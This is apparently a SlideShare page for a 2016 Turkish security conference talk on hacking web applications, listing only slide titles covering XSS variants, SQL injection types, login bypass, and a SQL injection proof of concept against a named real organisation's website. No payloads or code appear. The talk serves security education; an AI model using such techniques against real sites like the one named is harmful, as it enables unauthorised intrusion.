Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Web Uygulamalarının Hacklenmesi

528 visualizaciones

Publicado el

Zero-day Conf, İstanbul Kültür Üniversitesi 2016

Publicado en: Internet
  • Sé el primero en comentar

Web Uygulamalarının Hacklenmesi

  1. 1. whoami Security Researcher @ Netsparker Ltd. Developer @ Another Times Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
  2. 2. ping pong?
  3. 3. ping pong?
  4. 4. cross site scripting • Reflected XSS • DOM Based XSS • Stored XSS
  5. 5. reflected cross site scripting
  6. 6. reflected cross site scripting
  7. 7. dom-based cross site scripting
  8. 8. stored cross site scripting
  9. 9. stored cross site scripting
  10. 10. stored cross site scripting
  11. 11. sql injection • Union Based SQL Injection • Blind SQL Injection • Time Based SQL Injection
  12. 12. union based sql injection
  13. 13. login bypass
  14. 14. blind sql injection • Ya hatalar gizlenmiş ise? (error_reporting(0)) • Ya mysql_* fonksiyonlarının başına «@» konulmuş ise?
  15. 15. blind sql injection
  16. 16. blind sql injection
  17. 17. blind sql injection
  18. 18. time-based sql injection • Ya arka planda çıktı vermeyen bir query çalışıyor ise? – Count Query – Update Query – Insert Query – Delete Query – Relationship Query
  19. 19. time-based sql injection
  20. 20. time-based sql injection MySQL Server Microsoft SQL Server Oracle Server
  21. 21. sql injection poc Uluslararası Af Örgütü (amnesty.org.tr)
  22. 22. sql injection poc
  23. 23. where is the güvenlik?
  24. 24. questions
  25. 25. thanks www.omercitak.com All Social Platform: @Om3rCitak

×